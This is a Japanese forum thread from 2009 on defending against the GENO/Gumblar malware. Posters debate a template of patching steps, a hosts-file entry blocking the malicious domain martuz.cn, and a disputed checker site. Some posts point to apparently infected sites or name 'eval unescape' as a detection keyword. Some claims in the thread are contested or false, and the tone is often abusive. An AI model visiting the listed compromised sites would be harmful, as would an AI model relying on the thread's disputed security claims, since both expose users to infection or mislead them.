Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
これで900程度で次立てる
チェッカーはアフィとか以前に嘘を直すまでは外す
(readerのバージョン、フラッシュのリンク)
>>6
>>254 adobe javascript→acrobat javascript
最近、楽天にしか登録してないメールアドレスにスパムが届くという話があるが GENOウィルスが騒がれだしたのは楽天にショップがある所からだよね? メールアドレスも抜き出すんじゃないのコレ?
いつのスレかは忘れたが、不発のときに、コマンドの起動がトリガーになり得る
という話はあった。確認方法は
>>3 が確実なら、それで十分なのでは。
結局genoウイルスチェッカーは信頼できないんか
cmd、regeditでトリガーって もう既に不発じゃないいんじゃない
100%で確実じゃないとか頭おかしいでしょ
>>254 Adobe Readerの最新版は9.1.1だろ。
>>6 9.1.0でGENOの対処は終わってます
最新版は将来変わるので
バージョンは書かないで最新版にあげろとだけで
>>264 adobe javascript→acrobat javascriptにいい加減書き換えろボケ
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
これで900程度で次立てる
チェッカーはアフィとか以前に嘘を直すまでは外す
(readerのバージョン、フラッシュのリンク)
>>6
>>263 だね 手動でupdateしないと9.1.1にならないよね
>>254 ,
>>267 9.1.0になるのでアップデートかけて9.1.1にしろと書いとけよ > Reader
9.1.0でGENOの対処は終わってます
>>270 終わってないぜ。9.1.1にしないと無意味。
終わってる まとめでなんでこんなデマ書いてんだか
どっちだ?最新は9.1.1なんだから、それでいいじゃん
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
どこまでGENOというかだが 9.1.0にある脆弱性ついたのまだないのかな とりあえず最新版にしとけでいい バージョン表記はいらん
同感
Adobe製品なぞ全削除推奨
PDFは妥協するとしてFlashはさすがに無理無理
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
hostsに追加おまけリスト(127.0.0.1 martuz.cnも入ってるよん)
ttp://www1.axfc.net/uploader/Sc/so/5031.zip DL:GENO
追加>60
shine
>>276 それだと自称最新版ちゃんが出てきちゃうから
バージョン表記は必要だとおもうよ
9.1.1が最新だーよ
そうあるよ
>>284 >インストール後本体をアップデートしておく事
>adobe readerを開いて ヘルプ→アップデートの有無をチェック
↑がテンプレ修正案に入ってるからバージョン表記は無くていいよ。
また特定のサイトにアクセスできなくなった昨日再インスコしたばっかりなのに
Adobe Readerはインストール時にReader SpeedUpで 広告からスクリプト関連まですべて削除しとくといい。 あとで必要になったらデフォルト状態にすぐに戻せるし 起動も読み込みも爆速になる
9系は起動遅くないような
>>254 adobe readerの最新版入れたはずなんですが9.1.1になってるのっておかしいですか
マトリックスゴイ
あああすみませんレス読んだらちゃんと最新版ってありました
>Vistaの人はは コレなんで直さないの
母
>>296 文章の検討が十分でないことを意識してもらい、
気を緩めず、緊張感を持って読んでもらうため
チェッカーの人は一応まだ生きてたんだなw 微妙に記述が変わってる
しつこくテンプレやってたのはアフィチェッカーの奴なのか
検出できるの今avastだけなの?
次スレ立てる人テンプレだけでもトリつけて4辺りにレジストリ改変させようとする キチガイが常駐してることも書いといたほうがいいかも
GENOウイルスチェッカーも個人的にはウイルと同等 アフィ野郎は死ね
ウイル
>>301 それを知る為にもテンプレ書く奴はトリつけて欲しいよな
テンプレでチェッカー外そうとしてるのに アフィチェッカーの奴なわけない
そろそろアフィチェッカーはテンプレから外すべきだな で、身元割れ なにしれーっとアフィ仕込んでやがる
前スレで外したのにわざわざ復活さしたからな
復活さした
チェッカーの中の人もアンチ(っていうかアフィ厨)も必死
どうやら、このスレには海外の方が多いみたい
とにかくせめてフラッシュの記述だけは修正しないと これで大丈夫だと思って引っかかるIEの奴がいるだろ アフィチェッカいい加減直せよ
PCJ○PANに対策が載っていたけど、目新しい事は載っていなかった。まとめに書いてあることとだいたい同じ。
googleだと「コンピュータに損害を与える可能性がある」と表示してくれるけど Yahooは何も表示されないから怖くて使えない
現verのノートンにnortonセーフウェブなる保護機能(検索エンジン結果の拡張対応)が付いてるが あれは使い物になるのか? 有効にしていると常時、ノートン鯖にアクセスするから重くなるだけのような気がするんだが
少しはね
>>316 気休め程度
たぶんリストはローカルに持ってるとおもう
319 :
172 :2009/05/30(土) 00:45:11
>>196 Vista UAC回避が明記されてるexploitツールも見かけた
※
Adobe Readerに関してはバックグラウンドDLも無効にする
ネットをやめれば万事解決
ウィルス如きが怖いようならPCは使わない事だ
404、403エラーページに仕込まれ始めたって話ホント?
どんどん脈絡なくウイルス全般の話して不安を煽るやつがおるのか
>>323 それマジソース
どうせカスタムエラーページだと思うけども
追記です 話題になってるのはこのサイトみたい h●●p://www.mutsumi-house.com/aindex.html
うわあ…
404だしてもGenoみあたらないんだが
>>329 ちゃんと上で指定されてるサーバーいったか?
331 :
名無しさん@お腹いっぱい。 :2009/05/30(土) 06:27:25
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /aindex.htmleee was not found on this server.</p> </body></html>
例のGENOチェッカーサイトはamazonnアソシエイトに通報すれば普通に処罰されるよ てかなんでお前ら通報しないの?死ねよ
>>332 え アソシエイト が仕込まれてるの?
知らずにやってた・・・
アクセス数がかなり多く、サーバー維持が大変です。 差し支えなければ下記アフィリエイトリンクのご利用よろしくお願いします。
>>337 geno2chtc-22
-22って付いてるところがアフィの元。
geno2chtcね。
iframeってサイトみただけでクリックしたことになるんですよね?
暇だからAmazonに通報してみるか
>>342 サイトみたときに同時に読み込まれるけど
クリックはしないとおもう
346 :
名無しさん@お腹いっぱい。 :2009/05/30(土) 14:04:03
>>344 どんな規約に違反してるの?
そもそもアマゾンって踏んだ後に購入しないと金が入らない仕組みじゃなかったっけ?
ASAHIネットのユーザーサイトでスクリプト埋め込みを 確認したんだけどASAHIネットの通報先がイマイチわからん eval unescapeでぐぐってたら出てきた gumblar2.5個(1つできそこない)、martuz1つ確認 www●ne●jp/asahi/travel/net/sub5.html
>>350 whoisでは
remarks: Email address for spam or abuse complaints : mailto:
[email protected] ってなってるけど、このアドレス死んでるの?
352 :
名無しさん@お腹いっぱい。 :2009/05/30(土) 15:14:48
こんなスレまだあったんだw
ニートはアフィとか嫌いだよな 世界はタダで俺に奉仕しろってキチガイすぎるぜ
アフィ嫌いじゃないよ おれ自身アフィのおかげで助かってる身だし
今頃騒いでる奴は馬鹿。
アフィはあっても無くてもどっちでもいいだろ 問題は中身
>>356 叩きたいだけの能なし基地外にそんな正論言っても無駄
チェッカー使わないから別にいいけどね
アフィ云々より運用板での発言が気になる アフィなんかどこでもしてるし別に問題ない
日本語通じない人に何言っても駄目っす ID出ないから自演しまくりだし
363 :
名無しさん@お腹いっぱい。 :2009/05/30(土) 17:53:57
GENO関連なので、こちらに誘導されてきました。 GENOウイルスにかかって パソコンをリカバリしてからちょっとおかしい?ので 質問させてください。 ウインドウズXPで、機種はレッツノートです。 ローカルディスク(C)の中身って、 普通、 Documents and Settings Program Files util WINDOWS くらいですよね? それ以外に、なんか長い英数字の並んだ名前のフォルダが存在するのって おかしいですか? 5558de〜とかって30文字くらいのフォルダ名です。 多分前はそんなフォルダなかったと思うんですが…。 ウイルスの駆除がまだできてなかったってことでしょうか?
ようやく修正したなww
■ Opera(→ダウンロード)でプラグイン、Javaをオフ。(JavaScriptのみでは全く安全です。) こいつ技術者じゃないんでないの あまりに短絡的
>>363 OSアップデート時のごみが残ってるだけだとおもう
GENOチェッカーにある ■ adobe flashplayerを最新版に更新 IE用のアップデーターです。↓も必ずインストールしてください。 05/30更新 重要! fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_10_active_x.exe この下のexeは更新して大丈夫だよね? なんかexeが直リンされてると怖い
あのサイト見るな
不十分サイト
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
100%で安全とか頭おかしいでしょ 普通は修正する
とにかく次スレで外す
376 :
363 :2009/05/30(土) 18:41:24
皆様返答ありがとうございます。
大丈夫そうということで、とりあえず安心しました。
どうもありがとうございました。
>>372 フォルダの中身はsupportとかupdateというフォルダと、
他本当にファイルがいっぱいで書ききれないです…。
>>363 それは、WindowsUpdate等の作ったファイルなので消しちゃだめ。
>>370 IEだとめんどくさい処理がいるからそのリンクでいいよ
>>376 自分の知ってる限りだと
winupdate関連以外にもcreativeのサウンドカード(わけのわからないファイルがsystemにくいこむ)や一部のソフトの履歴としても
似たようなものが作られる事があるよ
チェッカー叩きってなぜか集団で来て集団で去っていくね よっぽど離れてても心が一致団結した人たちなんだね
叩きってねえ 成長しろよいつまでフラッシュのver嘘書くの
自演
なにをいまさら つうか全部おれの自演
うお。チェッカー修正キタ ありがてえ
flashの記述はましになってよかったね 叩きのおかげか
感染してるとWindows Updateに接続できないって事は 言い換えると接続できれば感染してないってことなのでしょうか
そうかもしれないしそうじゃないかもしれない ウイルス全般に言えるような話は他でやってね
>特に2ちゃんねるで様々な情報が錯綜していますが、異常に警戒する必要はありません。 >今回の件に関してはこのサイトに従って対策を施せば、大事に至ることはまずないでしょう。 >wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。 >そこで、情報の取捨選択に困ってる人のために当サイトを見るだけで十分なようにこのサイトは作られました。 嘘情報ずっと載せてた危険サイトの癖に
チェック先のソースを表示して、 感染部分を赤字で教えてくれる他のチェッカーの方が断然使いやすかった。
>>379 おい更新できねーじゃねーか糞が
IEが更新中止しやがる
感染サイトを確実に見極めるにはGENOチェッカーでは役不足ですね 私は独自の対策より99.999%、感染か未感染か確かめられるのでその方法でサイト検証はしました 今後、変異したGENOウイルスが出たとしても99.999%防御できるだろうと確信しています
チェッカー、0.4%とか更に細かくなってるんだが気のせいかw?
ブラウザは用途に応じてIE/firefox/operaで使い分けるのが最強だな 〜だから駄目って事はない
自演が痛すぐる
IDない板で何言っても見苦しい事になるだけ
>>393 なぜなら彼もまた特別な存在だからです。
>>393 GENOチェッカーは曖昧な表現のため慎重派は0%以外を危険とみなしてしまうので使い勝手が悪いのです
ウイルス検出ソフトで例えると「誤検出」した状態と同じです
GENOチェッカーも、感染しているか、否かを判断できるなら使えるのですがとても残念です
突然クソ重くなったんで感染したか!?と思ったら noscriptが重かっただけだったでござる
■ Opera(→ダウンロード)でプラグイン、Javaをオフ。(JavaScriptのみでは全く安全です。)5/30更新 1.[F12]を押す→[プラグインを有効にする]のチェックを外す。 2.[F12]を押す→[javaを有効にする]のチェックを外す。 sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。 この方法だと多くのサイトで利用されているJavaScriptを犠牲にせず、簡単に安全なブラウジングが実現できます。 これってどういう事なんだろう javascriptって危険なんじゃなかったっけ?
ただのインチキ情報だろ
>>402 火狐は相変わらずメモリリーク問題がある
>>403 全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません
>>404 雑魚は黙ってなさい
Javaなんてインストールされてないだろ そんなんで安全ならこんなに問題になんてならない
Javaは関係ないだろ? そんなことよりAdobe製品の対策しとけば問題ないだろ
Javaの脆弱性が突かれたって言うのか 全然Sunは対応してないようだが
>>406 まじでjavaの脆弱性なら報告してくれよ
間違いなら迷惑だから訂正して欲しい
それopera関係ないワナ
operaもjavaも関係ない
ウソクソ情報垂れ流してまじいいかげんにしてほしい
50,727じゃなかったんだけど…おわ……た
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7 ./ ./ ̄/ / /__/ / / ____  ̄ / / 'ー' _/ / ___ノ / /____/ ___ノ / /___ノ /____,./ /____,./ _ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7 / ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._  ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./ /__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
yahoo!JAPANトップページのニュース・・・ 国交省岐阜国道事務所が感染してたのってもしかしてGENO?
もしかしてGENO?
システムフォルダ内のファイルやレジストリを書き換えるのかな ならOutpostとかComodoあたりでも防げそうだね その他大概のHIPSで防げそうだけど
もしかして恋?
>>406 チェッカーのサイトの人か
修正しとけよ
JavaとJavaScript混同するなよ
雑魚は雑魚なりにがんばれ
このスレ見てんなら間違ってるところ他にもあるから直せばいいのに 意地になってるのか
チェッカー使えねえなwwww
終焉。
426 :
172 :2009/05/30(土) 22:52:21
今回悪用されたAdobeの既知の脆弱性はRemote Exec Vulnだと思うけど、 Comodo Internet Securityにおいてバッファオーバーフローが発生した時点で ブロックできることを確認したよ
COMODO伝説
バスターばかにすんな
m9(^Д^)
>>430 岐阜国道事務所の件までハッカーによる改ざんであるかのような記事だな
クソだな
こういう鯖ってUNIXだっけ? まさかWINって事は無いよな。
どっかのオンラインゲームで、Windowsを鯖に使ってますって公言してるのを見て笑った覚えがある。
>>370 落としたら正規のプログラムみたいだったぞ
え?それでやったけど危ないの?
危なくないよ 糞サイトだからあんまり信じないのが良いだけ
gumblar。cnは5/18に停止、martuz。cnも5/19に停止している みたいだけど、最近感染した人はどこに誘導されてるんだろう?
もっと前から感染してたのを最近になって気づいたってだけじゃね
script error line 86 position 3が出るようになったけど これはacrobat javascript関連でOKでしょうか?
此処に書き込む感染した奴ら 確実にもう2,3個トロイ入れられトル
そっかー
バスターばかにすんな
>>439 そういうドラマチックな展開が好みか
現実にはありえないがね
flashとリーダー 最新に更新しとけばいいで終了 亜種だ、別種だ?そんなのどうとでもいえるわい
「Vistaの人ははUAC」が気になって夜も眠れません!! ここは修正しないんですか?
グーグルの検索結果一覧に各HPに入らない方がいいサイトには紫、大丈夫なのは緑が付いてたけど 先読み機能切ったりテンプレの対策したら色付かなくなったんですがそういうものですか。 それともウイルスが原因?
450 :
440 :2009/05/31(日) 01:43:10
だれかおせーて
日本語で書けカス
452 :
名無しさん@お腹いっぱい。 :2009/05/31(日) 01:44:59
はいはい
454 :
名無しさん@お腹いっぱい。 :2009/05/31(日) 01:46:49
455 :
440 :2009/05/31(日) 01:48:02
・゚・(つд∩)・゚・
247 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/29(金) 14:49:42
困った時は
>>60 事前予防は
>>60 こいつ通報してくる
ウィルス直リンをマルチしてるならともかく、その程度は通報しても無駄
>>452 おいおい
人を貶してる上に間違ってるだろ
チェッカーの人お疲れ。 ありがとう、助かってるよー
462 :
440 :2009/05/31(日) 02:48:25
(´・ω・`)
>>448 自分の環境では色付いてないかさっぱりらわからん。
ないから さっぱり わからん。 さっぱり を強調したかった気持ちを汲み取ってくれ。
念のためFlash Playerをダウンロードしてインストールしたけど、バージョンが10.0.22.87で 2月末のから変わってないじゃん。 もしかしてチェッカーの人にだまされてる?
最新verは、10.0.22.87で合っている
対応済 Flash Player 9.0.159.0 10.0.22.87 Adobe Reader 7.1.1 8.1.4 9.1.0 最新 Flash Player 10.0.22.87 Adobe Reader 9.1.1
元々、Flash Playerの方は問題なかったって事でそ
Adobe Readerの対策版が出たのが3月19日
運用板は知らんがこのスレの発言見て叩かれるのも納得
・wiki、2ちゃんねるの情報は、誰でも書き込みできてしまうので、信憑性に欠き、初心者の方は惑わされやすいです。 お前のサイトはお前しか更新できないから信用できねえんだよww
>>473 信用できねえんだよww ← 負け犬特有の悲壮感漂う(ry
勝った人おつかれさまです
476 :
251 :2009/05/31(日) 04:47:08
メール来た >継続して商品の調達に努めてまいりますが、調達不能な場合または入荷数 の関係上キャンセルをさせていただくこともございます。 2ヶ月前に予約したのにブツが無いってどういうことなの・・
バスターが気に食わないならアフィリンク外せっての 性格が悪いな
しかしチェッカーの人も忙しいな ずっと書き込みしてるのか そんな暇あったら間違い直せよ
昨日もこのスレに100レスは書いた。 今日は200レスは書いてさっさと新スレ立てよう
windows updateで何かそれらしいのに対応しました何ちゃらみたいなのがあった
そんなものはない
GENOチェッカーお気に入りから外すわw もとから信用してないけどw
484 :
440 :2009/05/31(日) 09:22:12
>>467 わからないですねん
script error line 86でぐぐったけどヒットしなかた
何の恨みがあるんだか
だからなにをどうした時に出るどれのエラーだよ
クソサイトみて安心だと思ってたらIEで感染してエロ貯蓄がパーの人でしょ
488 :
440 :2009/05/31(日) 09:26:43
>>486 なんか2ch5時間くらいして疲れて寝てしまって
気が付いたら出てたえらーです(`・ω・´)
おいおい何だよこの過疎っぷりは 結局一人が自演してただけなのね 哀れだなww
>>491 感染してるぞおいwwwwwwww
>60を実行するんだwwwww
>>470 運用板見りゃいいじゃねーか
あいつのトリ検索したら発言出てくるだろ
いちいち他のスレの書き込みまで覗いて叩こうとするのはよくないと思う。 今は大人しいんだから放っておきなよ。
>>484 自分のサイトじゃないの?
エスパーじゃないんだから440自身が説明できない現象じゃ
どうしようもないよ
XcxlmnqGqU
運営スレであんだけファビョって インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて 今度は何をしてくれるのかな
この粘着って、自分が気に入らない事した奴が ほかの奴らに自分以上に構ってもらえてるのが羨ましくてしょうがないんだろうなwwww
9.1.0では駄目の記述さっさと直せよ 亜種がどうこうで結果的に正しいからいいとかいうなら 技術者の資格ないしさっさとやめて ゲーム脳とか水結晶でも信仰してろ
cccクリーナーとか勘弁してほしいがな
>>499 運用板でのことは本当にアレだけど
テンプレ変えた奴は別じゃないのかね。
そこまでわかりやすいことしたら叩かれるのは目に見えてる。
だからもういいってば もうスレに来ないだろうしわざわざ話題にすることでもないだろ 話題にすればまた荒らすからやめとけ
利するのはヤツしかおらんし コレまでの言動見てると叩かれてもヤル子よ彼は
テンプレ外したらな
チェッカー様の話題になると荒らしとセキュ板叩きが来るんだよ なんかの偶然かな
とにかく新スレをたてるんやー そしてシンテンプレにするんやで
8%でまあまあ危険ってなんだよ ろくでもないコメントどうにかしろ
荒らしとセキュ板叩きってどれのことかしら
>>512 だいぶ前に見たわ。
セキュ板の民度が低くて話にならないだとか何回も書いてた
チェッカーの話はやめよう。 余計なこと話したらまた文句言われる。
クソサイトの話はやめよう
初心者は使わないほうがいい 全部危険とか言い出すし
初心者だから使うんだろ
いいえ
はい
GENOチェッカーで危険と出たのでもう見にきません
ウイルス収まった?? 801連中しかしらないサイトだし、どうなったかッわかりづらいな
ココそういうスレじゃねえから
>>456-457 ID出す話でも そうだけど、こういう話になると、
いつもタイミングよく、直後に否定のレスが付くね。
ココそういうスレじゃねえから
テンプレは直さないほうがいい! 荒れるぞ
直さないと荒れるワ
>>527 気のせいかな。今度は都合の悪いレス
流そうとしてるように見えるんだけど。
そのトーリ
全部通報せえやハゲ
詰めが甘いスレだ
>>532 /)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ こまけぇからハゲるんだよ
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
AV入れてみたが思ったよりも軽くて予想外。 ちゃんとスキャンしてるのか試しに鑑定すれからGENOウイルスをダウンロードしたけど。 全て検知した。
>>535 スキャンが重い。今、床ピタン焼肉で盛り上がって保健所にメールしてるけど
時期が悪かったら感染しまくりだったんでは・・・・
537 :
535 :2009/06/01(月) 00:22:05
535は誤爆です。すんません。汁。
テンプレとかどうでもいいっしょ もうGENOウィルスなんて引っかかる奴いないし
じゃあこのスレでオワリな
>>538 どうでも良くないから話題にでるんだろ。
>もうGENOウィルスなんて引っかかる奴いないし
そう思うならこのスレにくんなよw
今は危険性無いんだろ?
腐女子に隠蔽されて状況がわからなかったな 視ね腐れ女ども
亜種って言っても報告は無いんだろ?
>>543 亜種だらけだったから、各ベンダーのシグネチャが遅れまくったんじゃないか。
本体の配布が止まってしまったから、どれくらいの亜種がカバーされてるのか
よくわからないし、感染放置されているサイトがいきなり活動を再開する
可能性もある。
GENOウイルスと他のウイルスの違いは何?
もうスレ立てるとかとんでもねえなあ
テンプレもアフィサイト準拠にわざわざ直しとる…
落ちるまで放置でいいんじゃね?>アフィ準拠 必要なら、アフィチェッカー入ってないスレ立ててそっち利用すればいいよ。
次スレワロチww チェッカ信者が立てやがったww アンチチェッカ派が立てるに40ペリカかけてたんだがなあ…
質問スレ池カス
553-554
553ー55449
何だかジーンズの型番みたいだな
はあ
んもー、改ざんされるような管理なら公開するなよ!!
何のソフトの脆弱性つくか書いてないのか
未対策の脆弱性突かれたら終わりだな
>>562 元記事にも書いてない。
google-analytics.comに似た名前のドメインに誘導するってことくらいしか
わからん。
ウイルス対策ソフトのことかよ
もし かも 多分
569 :
名無しさん@お腹いっぱい。 :2009/06/01(月) 19:19:30
しかし、このトロイの木馬を埋め込むことによって、誰が得をするの? ウイルスなら愉快犯もあるだろうが、データ送信してる今回の奴とかなら、その線から吊し上げたほうがいいんでね?
してません
ざんねんだったな
573 :
名無しさん@お腹いっぱい。 :2009/06/01(月) 19:41:50
>>570 守ってくれる!
と強く念じる心があれば・・・
>32 これって、Windows2000でもいけるの?
578 :
名無しさん@お腹いっぱい。 :2009/06/02(火) 01:17:39
楽天のトップページにある「激安1本当り23円から」の リンクをクリックすると、PG2で「GENO」がブロックされる。 まさかと思いソースチェッカーで確認したら、 このページに埋め込まれたJS内に 「unescape」「eval」「replace」の3つを発見。 ここのURLは貼らないほうがいいっすよね? 他にも楽天の爽快ドラッグが感染している模様。 もしかして他にも楽天内で感染してるショップが たくさんあるんじゃないかこれ。
579 :
名無しさん@お腹いっぱい。 :2009/06/02(火) 01:19:38
というかどちらも同じ外部JSファイルを使用しているので、 楽天全般の問題?
マジか?
誤爆じゃないのか? s_code.jsには確かにunescape、eval、replaceが含まれているけど GENOじゃない
・激安23円 ・総会ドラッグ 確かにunescape等はあるが ソース見たかぎり特に異常は無いが?
>>582 うん、GENOでもないし、ヤバいスクリプトでもないね。
unescapeもevalもreplaceも文字列を評価して置き換えたりする場合に
普通に使う関数だから、これらが入っていたらGENOだ、っていうのは
乱暴すぎる。
585 :
578 :2009/06/02(火) 01:39:09
「unescape」「eval」「replace」があっても大丈夫なのか…。 JavaScriptにはうとかったもので、つい驚いてしまった。 あからさまに怪しげなソースになってない限りは大丈夫そうなんですね。 っていうか他の店で買い物した直後にこれ見つけたんで、 てんぱってしまった。お騒がせしました。
でも楽天の店舗の一つも確か感染例があったと思うから注意するのは良い事
>リンクをクリックすると、PG2で「GENO」がブロックされる。 ここが少し気になるな PG2が反応するって事=GENOの該当IPに反応って事だからな
ガンブラさんより、
>>560 の方が気になって仕方ない
>>587 http://www.omniture.com と、omniture.comの管理下のサイトのリソースを利用している。
PG2で66.235.128.0 - 66.235.159.255あたりをブロックしてると
引っかかると思うけど、どういうルール使ってるのかも知らんし、
PG2自体使ったこともないから、よくわからんな。
592 :
581 :2009/06/02(火) 03:03:02
>>592 PG2ってどのIPをブロックしたとかいう情報はログに残らないの?
ソース見た限りじゃ問題なさそう。埋め込みのjsも外部jsも変なところは
ない。
Firefoxの先読み機能が有効だとリンク先に潜んでるのかもしれないけど、
そこまでチェックするのは面倒くさい。
>>592 この際、PG2導入して試してみるからそのリストupしてみて
mediafireは踏みたくない
595 :
581 :2009/06/02(火) 03:57:48
>>593 ブロックされたGENOのIPは全部同じ、楽天の202.72.52.16。
これと一緒に443ポートから以下へのアクセスもブロックされてました。
Archer Communications 66.235.139.118
これは自分が楽天で買い物していた間の記録のようで、
>>578 に気づいて以降の記録では、何度か楽天のサイトにアクセスしても
上記二つのIPは80ポートのみブロックされてました。
>>594 うpはOKです。安全なうpろだというか、
オススメのところありましたら教えてもらえますか?
597 :
581 :2009/06/02(火) 04:13:22
素人目に少し調べてみたんだが特に異常は見当たらず 詳しい人のレスを待て どっちにしても楽天は昔から裏で何をやっているか分からない企業なので買い物は勧められないな
>>597 mediadefenderでadobeのリスト配ってるものだが
そういう配り方辞めてくれないか?いいかげんウザくて仕方ねぇ
どうしても同梱させたいなら何があっても絶対に消されないうpロダにうpしろ
>>583 同じくソース見る限り、問題なさそうではあるが・・・
アフィチェッカーで20%とか出たから大騒ぎしてるのか?
普通に使う関数に大騒ぎ
evalとunescape同時に使うさいとは例外なくゴミ
>>605 ITMediaでも「GENOウイルス」って呼ばれてるのかw
2ちゃんの力も馬鹿に出来ないな まじで
www.gocebit・com.au<suspicious> www.mycebit・com.au/rego09/ <suspicious>
>>608 被害者に2ちゃんねらーが多かったということかと
これが、被害者におばちゃんが多いようなウイルスだったら、また違ったw
websenseの記事にあるスクショによると 新型?のは</body>タグの後にながーいjsスクリプトでいいのかな
既出かもしれんが、感染したPCのsqlsodbc.chmを開いてみた。 FTPのホスト名・ログイン名・パスワードが記録されてた。ただし前後リバースされて。
>>612 一件だけ報告があったけど重ねて情報あれば助かるよ
仮想だとその辺がうまく動作しなくて確認できないから貴重
>>613 ありがとう。
追記になるけど、リバースされて記録されたのはgumblarが流行った頃に感染したPC。
もっと以前、初期のzlkon(GENO)流行時に感染したPCのは完全にイミフな文字列でした。
>>613 俺もVMに感染させたけど、最初に改変された状態のままで、ftpサーバに接続
しても内容が書き換わらなかった。
やはり、仮想PC回避コードが入ってるのかね?
ハッシュ確認しようと思ったんだけど ハッシュチェッカーってexeに直接ファイルをドラッグ&ドロップさせても問題ないのかな?
>>615 いや、正確なプロセスの位置を探せないんだよ仮想だと
618 :
名無しさん@お腹いっぱい。 :2009/06/03(水) 04:27:27
単なる四月馬鹿のネタなのにw
619 :
名無しさん@お腹いっぱい。 :2009/06/03(水) 04:38:19
今パソコンつけたら青い画面に英語で何か書いてある…パソコン動かない。avast入れてadobe reader、FLASH共に最新だったのに。昨日itune最新版更新したんだがこれが原因なのか?
何か書いてあるんなら、何が書いてあるのか書けよバカ
だいたいスレ違いだろ
622 :
名無しさん@お腹いっぱい。 :2009/06/03(水) 06:08:11
ところでバスターはもう対応済みなのかね?
>>617 それはないと思うけどなぁ。
プロセス間通信がまともにできなかったら、正規のアプリですら誤動作する。
なんで正規のアプリと一緒にしちゃうの
プロセスってかサービス関連が特殊だからだろ
そんなに特殊でもないけどな。
